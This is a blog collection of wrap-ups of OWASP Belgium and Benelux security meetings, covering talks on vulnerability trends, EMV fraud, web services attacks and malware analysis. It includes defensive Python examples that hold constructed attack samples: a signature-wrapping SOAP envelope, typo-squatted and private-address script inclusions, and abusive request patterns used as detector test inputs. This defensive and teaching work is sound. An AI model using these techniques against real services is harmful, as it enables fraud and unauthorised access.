Tag Archives: Owasp

OWASP Belgium Chapter Wrap-Up March 2013

Here is a quick wrap-up of the first OWASP Belgium Chapter meeting of 2013, organised today in Leuven. SecAppDev is running this week, so it was a good opportunity to bring two trainers to an evening meet-up: Yves Younan and Steven Murdoch. Lieven, from the OWASP team, gave a short review of the current Belgium chapter and projects. The room was full of (new) people. There were so many attendees that the organisers had to do a last-minute switch to a bigger room! That’s very good: seeing old friends is always nice, but new faces are always welcome. OWASP has so many important messages to broadcast to people. If you never attended such an event, please do next time… and it’s free!

The first speaker, Yves, is a Security Researcher at SourceFire and talked about “25 years of vulnerabilities“. To perform this research, Yves had a look at the main vulnerability databases like CVE and NVD. The goal was to build an overview of the vulnerabilities reported during the past years and, based on that, to see if we could expect some trends for the coming years. Since vulnerabilities started to be indexed (in 1988), 54,000 vulnerabilities have been reported. Some statistics were given by Yves based on two levels of severity: the serious vulnerabilities (CVSS >= 7) and the critical ones (CVSS = 10). This scoring is based on multiple factors like being remotely exploitable, affecting data integrity, availability, etc. Note that if not enough data is provided, the vulnerability will by default be classified as critical. This is a safe behaviour: if you don’t know your enemy, expect the worst. Since 1988, there was clearly a trend, as seen in the picture below, but fewer vulnerabilities were tagged as “serious” (33% in 2012). 9.16% were tagged as “critical” in 2012. Vulnerabilities are classified by types:

  • Authentication
  • Credential management
  • Access control
  • Buffer errors (overflow)
  • CSRF
  • XSS

Most important (in terms of occurrence) were buffer overflows, XSS and access control. Top-3 serious vulnerabilities: buffer overflow, SQL injection and code injection. For critical vulnerabilities: buffer overflow, “not-enough-info” and access control. And what about our best friends, the security vendors? The top-10 vendors account for 14K vulnerabilities, but we must keep in mind that some vendors have a lot of products in their catalog. The top-3 in numbers was Microsoft, Apple and Oracle. The serious top-3 was Microsoft, Apple, Cisco and the critical one was HP, IBM and Mozilla. BTW, it’s pretty sure that Oracle will grab some positions in 2013.

About the products:

  • In numbers: Firefox, MacOS X, Chrome
  • Serious: Microsoft XP, Firefox, Chrome
  • Critical: Firefox, Thunderbird, Seamonkey.

Note that some products share a lot of code, think about Firefox and Thunderbird (both are developed by Mozilla). What about Linux? Red Hat is the winner, followed by SUSE and Gentoo. And for Microsoft, the winners are Windows XP, Server 2003 and Server 2000. Of course, for a few years, mobile phones have also suffered from vulnerabilities. In this scope, Apple is the winner with its iPhone, which counts for 81% of the mobile vulnerabilities. This looks strange because there is much more malware for Android. Then Yves explained the methodology used to try to count 0-day vulnerabilities for Microsoft products. How? If a CVE is published before a Microsoft Security Bulletin, it can be considered as a 0-day. Results? In most cases, Microsoft communicates before a CVE is assigned. Only 13% could be considered as 0-day vulnerabilities.

And what is the situation today? (Statistics for the period from 1st January to 14th February.) The type “not-enough-info” comes in first place. Buffer overflows remain in 2nd position. And who’s the top vendor? Guess who? Oracle, of course, with the multiple Java vulnerabilities reported in the last weeks. Finally, Yves tried to give some predictions about the future. For him, buffer overflows will remain a very important type of vulnerability. Access control and privilege issues will grow. At the vendor level, Oracle will remain in 1st position and Google will probably enter the top-10.

Some conclusions to this research? Fewer vulnerabilities were reported in 2012, but the percentage of critical ones increased, and for the next two years the trend will continue! If you would like to read more about this topic, the full report is available here. The talk was not technical and was only based on vulnerability databases. I would expect more facts. Usually, I don’t have a lot of time to read such reports with plenty of statistics and this presentation was a great opportunity to review the report content. Maybe a last tip: regularly check sites like CVE, NVD or OSVDB to get updated with new vulnerabilities.

After a small break, Steven, Senior Researcher at the University of Cambridge, talked about a hot topic: security in banking applications. In the UK, “Chip & PIN” has been available for five years now (based on the EMV standard). It’s convenient: the user puts his card in a reader and gives his PIN. The UK was a very early adopter (2006) of this system. The goal of EMV was to drastically reduce fraud. Did it succeed? This is not sure. Steven reviewed some statistics about fraud and some types even grew, like counterfeit fraud. Techniques exploit backwards-compatibility issues. Indeed, the old magstripe can still be used as a “failover” because the upgrade to Chip & PIN was very complex and expensive to perform in one step!

Counterfeit fraud increased again after the deployment of EMV. It was easier to collect PINs at a POS instead of an ATM. Attackers try to find the weakest link. Online banking started in 2009 and is growing. The responsibility for some fraud shifted from the merchant to the customer. Another fact: PoS (“Point of Sale“) terminals are difficult to harden compared to regular ATMs. Steven gave deep information about the vulnerability discovered by his university.

Then he talked about the “no-PIN attack“: it allows criminals to use a stolen card without knowing the PIN. To achieve this, you need a device between the genuine card and the reader. This is some kind of MitM attack. A demo was even performed for UK television:

This was three years ago! And today, what’s the situation? Well, according to Steven, not much changed. Cards issued by some banks work and others don’t. Why was this attack possible? Because EMV is complex, it uses a bad design of flags exchanged between the card and the reader, and implementations have problems. For the banks, it’s just a matter of risk: based on the number of transactions, banks could take the risk of facing some fraudulent events. Finally, the latest type of fraud which is still growing in the UK was reviewed: phishing and key loggers. Steven presented the different types of devices/controls used to authorise transactions, like more or less complex CAPTCHAs, TAN or DigiPass, but most of them also have issues.

Steven’s conclusion: EMV systems are open to a variety of attacks. Their complexity is problematic. There is a lack of resistance measures implemented and customers are still left liable. Today, for online banking, transaction authentication is essential, which requires a trustworthy display. The research is available here. Compared to the first one, this presentation was very technical. Maybe a little too much for me, who has no experience in this field.

OWASP Belgium Chapter September 2012 Wrap-Up

Steven Van Acker on stage

The holidays are gone, kids are back at school. For the security landscape, it means that security meetings are also back! The first OWASP Belgium Chapter meeting was organised tonight. Here is my quick wrap-up.

This time the meeting started in the afternoon with a technical workshop organised by SPION. Due to agenda conflicts, I did not attend this one. I joined the meeting for the second part, organised in a classic format: after a brief introduction with news about the Chapter and the OWASP foundation in general, two speakers came to present their research.

The first one was Steven Van Acker, who talked about remote JavaScript inclusions. There are plenty of publicly available JavaScript libraries on the Internet. It’s very easy for developers to do some shopping and use them without reinventing the wheel. Steven presented the results of research about the usage of those libraries in websites. Is it really safe to use them “as is“? Always keep in mind that browsers don’t care about what they execute. A crawler was developed to download website content from the Internet (approximately 3.3M URLs were visited) and the included JavaScript content was extracted. Steven gave some statistics. The one which hit me was about the top-10 of JavaScript code used: 50% of this top-10 is related to Google services! (mainly Google Analytics) Once we saw the amount of JavaScript code included in websites, some questions arise:

  • Should websites trust remote providers?
  • Can we safely execute their code?
  • What’s the quality of their maintenance?

Then, again based on the findings, some weirdness:

  • Cross-user scripting (ex: http://localhost/script.js)
  • Cross-network scripting (ex: http://192.168.2.1/script.js)
  • Stale IP-based remote inclusions
  • Stale domain-based remote inclusions
  • Typo-squatting XSS

This last example was really weird. They found some sites trying to load JavaScript content from googlesyndicatio.com (with a missing “n”). What did they do? They registered the domain and got hits! That’s an easy way to compromise websites. And what about the countermeasures? Steven gave two:

  • Executing the remote scripts in a sandbox (not always easy).
  • Downloading the script locally.

If the second one looks interesting, it could be difficult to implement. It’s doable only if the files do not change often. A very nice presentation with clear explanations.
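
To make the inclusion types above concrete, here is an added example (my own code for this wrap-up, not the crawler from Steven’s research) that pulls the `<script src>` URLs out of a page and flags each one the way the talk categorised them: localhost (cross-user), private addresses (cross-network), bare IPs (stale risk) and hosts one typo away from a provider the site intends to use. The sample HTML, the allow-list `KNOWN_HOSTS` and the page host `www.example.org` are constructed.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts this (constructed) site intends to load scripts from; anything one edit
# away from these is reported as a possible typo-squat.
KNOWN_HOSTS = {
    "www.google-analytics.com",
    "pagead2.googlesyndication.com",
    "ajax.googleapis.com",
}

# Constructed sample page: a same-origin include plus each inclusion type from the talk.
SAMPLE_HTML = """
<html><head>
<script src="/js/app.js"></script>
<script src="https://www.google-analytics.com/ga.js"></script>
<script src="http://localhost/script.js"></script>
<script src="http://192.168.2.1/script.js"></script>
<script src="http://1.2.3.4/lib.js"></script>
<script src="http://pagead2.googlesyndicatio.com/pagead/show_ads.js"></script>
</head><body></body></html>
"""


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in the document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def edit_distance(a, b):
    """Levenshtein distance; 1 means one dropped, added or substituted character."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(src, page_host):
    """Label one script URL with the inclusion type it represents, or None if unremarkable."""
    host = (urlsplit(src).hostname or "").lower()
    if not host or host == page_host.lower():
        return None  # same-origin include: served by the site itself
    if host == "localhost" or host.endswith(".localhost"):
        return "cross-user scripting (localhost include)"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # a DNS name, handled below
    if ip is not None:
        if ip.is_loopback:
            return "cross-user scripting (loopback include)"
        if ip.is_private or ip.is_link_local:
            return "cross-network scripting (private address include)"
        return "IP-based remote inclusion (may go stale)"
    if host in KNOWN_HOSTS:
        return None
    for known in KNOWN_HOSTS:
        if edit_distance(host, known) == 1:
            return "possible typo-squat of " + known
    return "unlisted remote inclusion"


def audit_page(html, page_host):
    """Return [(src, finding)] for every <script src> found on the page."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    return [(src, classify(src, page_host)) for src in collector.srcs]


if __name__ == "__main__":
    for src, finding in audit_page(SAMPLE_HTML, "www.example.org"):
        print(f"{finding or 'ok':55} {src}")
```
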

After a short break and pizzas, the second speaker for tonight was Dave van Stein. He talked about “modern information gathering”, or how to grab interesting data about your targets even without sending any packet to them. The talk was a brief presentation of techniques and tools used by pentesters or auditors to collect information. Here is a short list of tools covered by Dave:

  • shodanhq.com
  • serversniff.net
  • robtex.com (with a good domain visualisation feature)
  • Google advanced searches (intent:, inurl:, filetype:, etc)
  • Google Hacking DB
  • Search engine optimisation tools (can crawl target websites for you)
  • FOCA
  • Maltego

Most of them are classic ones. But that was a good reminder or a good way to populate your bookmarks! That was a good meeting to start the new season!

March 2012 OWASP Belgium Chapter Meeting Wrap-Up

Jim on Stage

Tonight, the second OWASP Belgium Chapter meeting of this year was organized. Two great (should I say “as usual”?) speakers were invited: Ken van Wyk and Jim Manico. Jim already talked during a chapter meeting last year and I was happy to see him back in our small country. After the classic OWASP news and updates provided by Seba, Ken started the evening with a presentation about “Common iOS Pitfalls vs. OWASP’s iGoat“.

First 2012 OWASP Belgium Chapter Meeting Wrap-Up

OWASP Belgium Attendees

A new year has started and why change good habits? I’m just back from the first OWASP Belgium Chapter meeting of 2012. Here is my quick wrap-up. The organization remains the same: the first few minutes were dedicated to some news from the OWASP organization, given by Seba. A survey was organized by the Belgium chapter about the attendees and their expectations. Some results were presented. Most members define their knowledge as between “security aware” and “experienced“. Good news, a lot of people are ready to participate and submit talk ideas! What’s on their wishlist for 2012? Mobile security, HTML5, SDLC, SAP and more demos/hands-on sessions. One recommendation for this year: more interaction between the chapter meetings (via forums, mailing lists?).

OWASP Benelux Days 2011 Wrap Up

OWASP Venue

The OWASP Benelux Days is a two-day event organized by three OWASP chapters (Belgium, Netherlands and Luxembourg). The 2010 edition was organized in Eindhoven (NL). This year, it was organized in Luxembourg. After a safe trip, sharing my car with a friend, we arrived at the Luxembourg University. Nice venue with all the facilities to make your life easier: a nice room with enough power plugs for everybody, good Wi-Fi, coffee. The catering was also excellent (that’s also important! ;-) )

The first day was dedicated to a training provided by Eoin Keary about “Secure Application Development“. 96 people attended the training, that’s not bad! When Eoin asked how many people are developers, hands went up. When he asked who’s performing “secure programming“, far fewer hands went up. This proves that security is not yet in most developers’ minds. My feedback about the first day is a bit mixed. First, the original training length is two days; it is difficult to review all the topics within one day, and slides were reviewed very quickly. The morning was very “static”. Classic attacks and countermeasures were reviewed. The afternoon was dedicated to live examples of attacks against a vulnerable website using BurpSuite. Bad point here: the Wi-Fi or the victim server was not properly sized and frequent timeouts made the exercises difficult to perform.

OWASP Training Room

After the training, Professor Yves Le Traon came to talk about “Security Testing“. It’s a fact: security testing must be promoted inside your organization! I liked the quote from A. Petrenko:

In God we trust, for the rest we test

Think about this! After an introduction to the testing concepts, more focus was given to XSS attacks and his XSS testing framework. A copy of the slides about security testing is available here. Very interesting presentation. The day ended with a social event organized in the center of Luxembourg at Agua de Côco. Nice people, nice conversations.

Agua de Côco

The second day started with a presentation of the “Interdisciplinary Centre for Security, Reliability & Trust” (securityandtrust.lu) and some news about the OWASP foundation. Did you know that OWASP already turned ten years old? The foundation was created in December 2001. Happy Birthday OWASP! And it’s amazing to review the job performed since the creation. Some numbers:

  • 15000 downloads per month
  • 30000 unique visitors per month
  • 2 million hits per month
  • 140 projects in 3 main areas: protect, detect, life cycle
  • 220 chapters / 100 active ones

For easier administration and event organization, OWASP Europe was created in June 2011. What are the goals for 2012? Build the OWASP platform, expand communication channels, grow the community and financial stability (because money remains a key element everywhere). A nice quote grabbed from a slide:

You can’t improve what you can’t measure

The rest of the day was dedicated to presentations covering several interesting topics. First, Brenno de Winter, a well-known ICT journalist in the Netherlands, presented a talk called “From Diginotar to Leaktober“. This was not a talk but more a story. Brenno came back on the Diginotar story, without any slides support.

Brenno de Winter

This was my preferred presentation! What happened with Diginotar, why Dutch public authorities were affected by the attack, the crisis which followed. Very interesting. A good question from the audience: “Was the bad communication from authorities due to incompetence or something else?” Brenno’s answer: “Maybe both of them, they didn’t know how to handle this!”. This sounds like a good summary. Following this story, a Dutch web site decided to organize a “Leaktober” event to prove that no data is safe!

After a coffee break, Justin Clarke talked about “Practical crypto attacks against web applications“. We need cryptography to keep the CIA (Confidentiality, Integrity, Availability). Based on a .NET demo website, Justin showed that implementing encryption is good but must be performed in the right way. Otherwise it can be easily broken. Nice live demos were performed. The last one was how to get a configuration file from an application using weak encryption (based on the vulnerability described in Microsoft Security Bulletin MS10-070).

Andrey Belenko presented his research about the iOS operating system with a talk called “Overcoming iOS data protection to re-enable iPhone forensics“. Forensics operations are based on three steps: acquisition, analysis and reporting. But modern mobile operating systems prevent this by implementing security features like password protection, keychain, storage encryption. Andrey deeply reviewed all the security features implemented by Apple: how encryption is performed, how keys are managed and stored. A lot of interesting stuff for people who are facing issues with iPhone and iPad devices.

Koen Vanderloock came to present “SIMBA – guarding your applications“. Leader of this OWASP project (“Security Integration Module for Business Applications“), he explained its purpose, the features, the future and how to implement it within your application. Basically, the goal of SIMBA is to simplify “User Access Management“. Why reinvent the wheel? (and take risks of bugs and bad implementation). If you have to manage users, roles and access in your application, please have a look first at SIMBA. All the required information is available on simbasecurity.org.

Ludovic Petit came to speak about the legal aspects of development. His talk, called “Do you … legal?”, explained the current legal aspects of computer crime in Europe. As a developer (or manager), if you manage data, you are legally responsible for it. Directors can be responsible for offenses committed by their organization simply because they failed to adequately exercise their duty of care (a legal person must be responsible) and the consequences can be enormous:

  • Financial
  • Reputation
  • Prosecution

The OWASP foundation also has a legal project from 2008: the OWASP Secure Software Contract Annex. It could be interesting to have a look at it. Keep also in mind: “Security as a service and … trust as a business“.

Trust

During Ludovic’s presentation, I read a good remark by a friend on Twitter:

#owaspbnl11 legal obligations presentation. But how many companies are prosecuted if they don’t protect data? None!

That’s true! Thierry Zoller presented “The rise of the vulnerability market“. The basis of his talk: constantly monitoring the threat landscape. Targeted attacks are on the rise, hacktivists became very popular. First, there are different classes of attackers:

  • Opportunists (script kiddies)
  • Targeting opportunists (hacktivists)
  • Targeted (digital mercenaries)
  • State funded (APT, espionage).

Those can be represented like a pyramid (the more the victims are targeted, the more the attack surface is reduced).

Attackers Classes

Thierry also explained very well the standard vulnerability life cycle (discovery -> notification -> disclosure -> patch available -> patch installed) and the associated risks (pre-disclosure risks, post-disclosure and post-patch risks). The vulnerability markets also evolved:

  • From 1995 to 2004, it was the fun times
  • Mid-2000s, commercial (vendors were informed / public disclosure and a patch available)
  • Late 2000s, the “black market” was created
  • Today, vendors are not informed, users are not informed, no patches available.

There is a huge business today around vulnerabilities. Companies are selling services (Secunia, VUPEN, ExploitHub). Others sell commercial exploit frameworks (Core Impact). The landscape changed completely. Thierry concluded that the importance of skill as a factor to measure attacker sophistication decreased. What increased? The motivation, funding and hence sophistication. Just a remark about the latest slides: they were really commercial and didn’t have a reason to be in a conference like OWASP. But this did not change my conclusion about the talk: very good analysis!

Jean-Marc Bost & Sébastien Bischof presented “The limits of eBanking“. eBanking applications are very complex web applications and, for a while, have also become a nice target. Even if banks try to increase security, Jean-Marc and Sébastien explained how attackers can still steal your money! First, some stats: Trojans are a reality (5% of Windows PCs are infected (source: Microsoft) and 25% are affected by trojans (source: Pandalabs)). About the timeline of attacks:

  • 2006 (Citibank – MitM attack)
  • 2007 (Malware in the browser)
  • Today: MI (“malware inside“) with malware like SpyEye or Zeus.

eBanking Trojan

Modern trojans are very complex and professional. Very difficult to detect. Example given by Jean-Marc: some of them not only inject into Firefox but also into the Firefox Crash Reporter to prevent disclosure of info to Mozilla! Sébastien performed a live demo which hid the Firefox process and started a rogue browser. The main problem is, once rogue code is injected into the browser, you cannot trust the display. As a conclusion, don’t forget this: WYSIWYS (“What you see is what you sign.“)

Sasha Rommelfangen, working for CIRCL, talked about “Dynamic malware analysis – or: the ~five deadly (anti-) venoms“. I was a bit afraid when I read the conference program: this would be a presentation with slides full of assembler code. In fact, not at all! Sasha’s presentation was excellent! When you have to analyze a malware, there are some essential questions:

  • Who’s behind the attack?
  • What was the motivation? Usual cyber criminal would like to get money, governments are looking for intelligence/sabotage and hacktivists “for the lulz”
  • What does the malware do? Understanding changes on the system, network activity. This is a necessary step for removal
  • Why should you be concerned? It might compromise servers/data centers!

There are two methods to analyze a malware. First, static analysis: it’s looking at a file and concluding about run-time behavior without running it (memory check, disassembly). What are the limitations? Packers, obfuscated code, encryption etc. The UNIX command ‘strings’ is sometimes a good start (look for interesting words like “shell“, “getf” or “putf“, etc). Dynamic analysis is much more interesting: the goal is to run the malware in a controlled environment. What are the problems? Most malware has anti-VM checks, anti-debugging, and there is Turing’s halting problem. To perform dynamic analysis, you first have to build your (safe) environment to be able to listen to the network, to fake network services like DNS and to accept/record all traffic on all ports. Sometimes malware is present in Office documents. I learned about a very interesting tool called OfficeMalScanner which finds shellcode in documents and extracts it to build an executable. Finally, the Microsoft SysInternals tools remain a classic in every analyst’s toolbox.

Last but not least, Lieven Desmet gave some results about his research on “HTML5 security“. Third-party JavaScript is present everywhere (examples: advertisements, gateways to social networks, tracking services) via script inclusion or iframe tags (not the same-origin policy). Lieven explained the methodology and scope of the research and of course some results. The full report is available here.

That’s all for this edition! What else? There was a CTF organized the second day, the winner received a free ticket for AppSec EU 2012. Write in your agenda right now: The next edition will be held in Belgium in Leuven (KUL) around beginning of December 2012. See you there!

June ’11 OWASP Belgium Meeting Wrap-up

OWASP AppSensor Project

Back from the latest OWASP Belgium Chapter meeting… Two speakers were scheduled tonight: Colin Watson presented the OWASP AppSensor project, then Andreas Falkenberg talked about modern attacks against web services like Twitter. A last-minute guest joined us: Josh Corman, who spoke about “rugged software“.

What’s new at OWASP? First, the OWASP European Foundation is now live! The list of ongoing projects keeps growing. At the moment, 155 projects are split in three categories: protection, detection and life-cycle.

Amongst this huge list, one of them is called AppSensor. It can be briefly described as follows:

The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. Current efforts are underway to create the AppSensor tool which can be utilized by any existing application interested in adding detection and response capabilities.

Colin, a leader of this project, explained the foundation of AppSensor: patterns for logging, architecture and signaling. Today, attackers are not script kiddies anymore but motivated hackers. They spend a lot of time finding vulnerabilities and trying to exploit them. AppSensor can protect you against those attacks. Two important questions to ask yourself:

  • Is your application under attack?
  • Has an unknown vulnerability been exploited today?

Your answer will probably be “I don’t know“. Colin gave three test cases:

  • Stepping through a process in the wrong order (ex: http://url/step4 then http://url/step2)
  • Requesting an unauthorized resource identifier (ex: http://url?id=1004 then http://url?id=1008)
  • Payment transfer exceeding the limit (ex: http://url?amount=10000000)

Typically, web infrastructures are protected by four conventional defenses:

  • TLS / SSL
  • Firewalls
  • Deep Packet Inspection
  • Web Application Firewalls

The problem? Most of them won’t block the test cases! Classic WAFs rely on generic protection (based on patterns) but do not follow the application requirements. So, how to perform proper attack detection? It must be:

  • Integrated – understand the application
  • Effective
  • Scalable

We need active defenses based on:

  • Event Detection
  • Event Analysis
  • Event Determination
  • Response selection
  • Response execution.

Detection can be achieved at several points like data input, access control, requests, authentication, file input/output, user trend, system trend, reputation, encoding, command injection, etc.

How to implement AppSensor into your applications?

  • What are the new project requirements
  • Retrofitting existing apps
  • Preliminary requirements
    • Logging
    • Risk assessment
    • Secure coding (nothing new!)
  • Monitoring & tuning

Note that proper logging is mandatory, using a correct signaling method (Colin mentioned CEF & CEE but others can be used). AppSensor proposes 50 different detection points and more than a dozen response actions like session reset, user or IP blacklist, speed reduction etc. Colin showed a demo; the dashboard looks impressive. But, by talking with some developers, the same question always came back: how to integrate AppSensor in an efficient way into your applications?
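
As an added illustration of the detect / analyse / respond loop described above (my own code for this wrap-up, not code from the OWASP AppSensor project), here is a toy in-application detector for Colin’s three test cases: a workflow step requested out of order, a resource id the user does not own, and a transfer over the limit. The detection point names, thresholds, responses and the session of the user "alice" are all my assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass, field

WORKFLOW = ["step1", "step2", "step3", "step4"]  # the only legal order of the process
TRANSFER_LIMIT = 10_000                           # assumed business limit per transfer
# Detection points, with the per-session event count at which the request is denied.
THRESHOLDS = {"wrong-step-order": 2, "unauthorized-resource": 1, "transfer-over-limit": 1}
RESET_AFTER = 3   # total events per session before the session itself is reset


@dataclass
class Session:
    user: str
    owned_ids: set              # resource ids this user may access
    next_step: int = 0          # index into WORKFLOW of the step expected next
    events: dict = field(default_factory=lambda: defaultdict(int))
    reset: bool = False


class AppSensorLite:
    """Event detection, analysis and response selection for one application."""

    def __init__(self):
        self.log = []   # signalling channel; a real deployment would emit CEF/CEE here

    def _signal(self, s, point, detail):
        """Record one event at a detection point and select the response."""
        s.events[point] += 1
        self.log.append(f"user={s.user} point={point} {detail} count={s.events[point]}")
        if sum(s.events.values()) >= RESET_AFTER:
            s.reset = True
            return "session-reset"
        if s.events[point] >= THRESHOLDS[point]:
            return "deny"
        return "log-only"   # below threshold: recorded, the application's own checks still apply

    def handle(self, s, path, params):
        """Process one request; returns 'ok', 'log-only', 'deny' or 'session-reset'."""
        if s.reset:
            return "session-reset"
        if path.startswith("/step"):
            step = path[1:]
            if step not in WORKFLOW:
                return "deny"
            expected = WORKFLOW[s.next_step % len(WORKFLOW)]
            if step != expected:   # e.g. /step4 requested right after /step1
                return self._signal(s, "wrong-step-order", f"got={step} expected={expected}")
            s.next_step += 1
            return "ok"
        if path == "/resource":
            if int(params["id"]) not in s.owned_ids:   # id=1008 when the user owns 1004
                return self._signal(s, "unauthorized-resource", "id=" + params["id"])
            return "ok"
        if path == "/transfer":
            if int(params["amount"]) > TRANSFER_LIMIT:   # amount=10000000
                return self._signal(s, "transfer-over-limit", "amount=" + params["amount"])
            return "ok"
        return "deny"


def demo():
    """Replay the three test cases for one constructed session (alice owns 1001 and 1004)."""
    sensor = AppSensorLite()
    alice = Session(user="alice", owned_ids={1001, 1004})
    requests = [
        ("/step1", {}),
        ("/step4", {}),                         # wrong order: first event, only logged
        ("/resource", {"id": "1004"}),          # hers, fine
        ("/resource", {"id": "1008"}),          # not hers: denied
        ("/transfer", {"amount": "10000000"}),  # third event overall: session reset
        ("/step2", {}),                         # anything after the reset is refused
    ]
    outcomes = [sensor.handle(alice, path, params) for path, params in requests]
    return outcomes, sensor.log


if __name__ == "__main__":
    outcomes, log = demo()
    print(outcomes)
    print("\n".join(log))
```
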

Colin @ OWASP

After a short break, Andreas presented a new type of attack. Web Services (“WS“) are more and more used everywhere today to manage applications and devices. Examples of users? Amazon, BMW (for communications with suppliers), military organizations (NATO, DoD). All of them are nice targets!

Andreas started his presentation with a definition of Web Services and the underlying technologies. Web Services are “an array of technologies and standards to implement remote procedure calls (RPCs)“. Underneath, we find the following technologies:

  • WSDL files (they define what operations are offered and how to reach them)
  • SOAP protocol (used to send WS messages in XML over HTTP(S))

What are the security features of SOAP?

  • XML encryption of an arbitrary part of a message
  • XML signature of an arbitrary part of a message

The way SOAP requests are processed is important to understand in order to conduct attacks. To what kind of attacks are they vulnerable?

  • All classical web application attacks (XSS, SQL injection, …)
  • But also a lot of new specific attacks like the “Signature Wrapping Attack”

Andreas gave a first example of a basic SOAP request without security features enabled. The example was a message sent to an e-commerce portal with a shipping address. He showed how easy it is to change the delivery address. The second example was based on a message containing a signed body (the signature is based on a regular PKI). Again, it was easy to move the signed body to an alternative place in the XML and create a new one with the fake data. This showed a major problem with the signature of XML files: it does not specify where the signed data is located! To conduct an attack, the prerequisite is just a valid signed SOAP message, which can be easily found by sniffing some traffic, reading logfiles, contacting evil employees or just by reading forums!

The next example explained an Advanced Signature Wrapping Attack against a nice service: Twitter. The social network is hosted by a major cloud provider. It is not Twitter which is vulnerable but the cloud provider itself: the Twitter backend is available via Web Services messages. In this case, SOAP messages contained an expiration timestamp. Alas, this information can also be hidden and the messages become valid forever. The vulnerability is based on a malformed XML message which contained more than one body. How is this possible? Just due to performance reasons! The XML schema validation is simply not performed. Here is another example of vulnerability.

What countermeasures are available to protect against this type of attacks?

  • Strict server side security policy
  • XML schema validation
  • Use “see what is signed” approach
  • Apply “XML signature best practice” by W3C

How to detect if your infrastructure is vulnerable? If it is not designed to resist against this attack, you are! For more information about Web Services attacks, have a look at ws-attacks.org.
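
The “see what is signed” countermeasure, as an added example (my own code, not from the talk or from ws-attacks.org): instead of trusting that the Reference URI points at the Body the application will process, the check resolves the Reference and compares it with the Body that is actually consumed, and it also rejects envelopes with more than one Body (the check schema validation would have made). The signature value itself is not verified here; the namespaces are the standard SOAP 1.1, XML-DSig and WS-Security ones, and the three messages are constructed.

```python
import xml.etree.ElementTree as ET

SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
DS = "http://www.w3.org/2000/09/xmldsig#"
WSSE = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
WSU = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"


def envelope(header_extra, body):
    """Build a constructed WS-Security envelope whose ds:Reference points at wsu:Id="body".
    Digest and signature values are placeholders: this example never verifies them."""
    return f"""<soap:Envelope xmlns:soap="{SOAP}" xmlns:wsse="{WSSE}" xmlns:wsu="{WSU}" xmlns:ds="{DS}">
  <soap:Header>
    <wsse:Security><ds:Signature>
      <ds:SignedInfo><ds:Reference URI="#body"><ds:DigestValue>PLACEHOLDER</ds:DigestValue></ds:Reference></ds:SignedInfo>
      <ds:SignatureValue>PLACEHOLDER</ds:SignatureValue>
    </ds:Signature></wsse:Security>{header_extra}
  </soap:Header>
  {body}
</soap:Envelope>"""


SIGNED_BODY = '<soap:Body wsu:Id="body"><Ship><Address>1 Main Street</Address></Ship></soap:Body>'
# Genuine: the one Body is the signed one.
GENUINE = envelope("", SIGNED_BODY)
# Wrapped: the signed Body survives (so the digest still matches) but sits under the
# Header, while an unsigned Body with other data is what the application would process.
WRAPPED = envelope("<Wrapper>" + SIGNED_BODY + "</Wrapper>",
                   "<soap:Body><Ship><Address>2 Other Road</Address></Ship></soap:Body>")
# Two bodies: the malformed shape schema validation would have rejected in the Twitter case.
DOUBLE_BODY = envelope("", SIGNED_BODY + "<soap:Body><Ship/></soap:Body>")


def referenced_element(env):
    """Resolve the ds:Reference URI the way a naive verifier does: by Id, anywhere in the tree."""
    ref = env.find(f".//{{{DS}}}Reference")
    if ref is None:
        raise ValueError("no ds:Reference in message")
    wanted = ref.get("URI", "").lstrip("#")
    matches = [el for el in env.iter() if el.get(f"{{{WSU}}}Id") == wanted]
    if len(matches) != 1:
        raise ValueError(f"Id {wanted!r} resolves to {len(matches)} elements")
    return matches[0]


def processed_body(env):
    """The element the business logic consumes: the soap:Body that is a direct child of the Envelope."""
    bodies = [child for child in env if child.tag == f"{{{SOAP}}}Body"]
    if len(bodies) != 1:
        raise ValueError(f"envelope has {len(bodies)} Body elements, expected 1")
    return bodies[0]


def check_see_what_is_signed(xml_text):
    """Return (ok, reason): ok only if the processed Body is the very element the Reference covers."""
    env = ET.fromstring(xml_text)
    try:
        same = referenced_element(env) is processed_body(env)
    except ValueError as err:
        return False, str(err)
    if not same:
        return False, "signed element is not the Body that would be processed"
    return True, "signed element is the processed Body"


if __name__ == "__main__":
    for name, msg in (("genuine", GENUINE), ("wrapped", WRAPPED), ("double body", DOUBLE_BODY)):
        print(name, check_see_what_is_signed(msg))
```
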

Andreas @ OWASP

Finally, a last-minute speaker joined us. Josh Corman presented some slides and good ideas about “rugged software”. The first message was: we are doing it wrong! Can we compare software to a building? A building is made of concrete and steel and we can rely on it. What about software? We can’t rely on it even if it is fully part of our daily life. We need to implement security, but business people hate it: it’s very expensive and prevents them from doing what they want.

Here is a small survival guide:

  • Defensible infrastructure
  • Operational discipline
  • Situational awareness
  • Countermeasures

This was a “turbo” talk but with a lot of interesting ideas. Feel free to visit ruggedsoftware.org for more info.

Josh @ OWASP

May 2011 OWASP/ISSA Belgium Meeting Wrap-up

Jim Manico @ OWASP

Tonight, a joint OWASP and ISSA Belgium Chapters meeting was held with three speakers. Very interesting content; here is a small wrap-up in “bullet-point” mode due to a lack of free time…

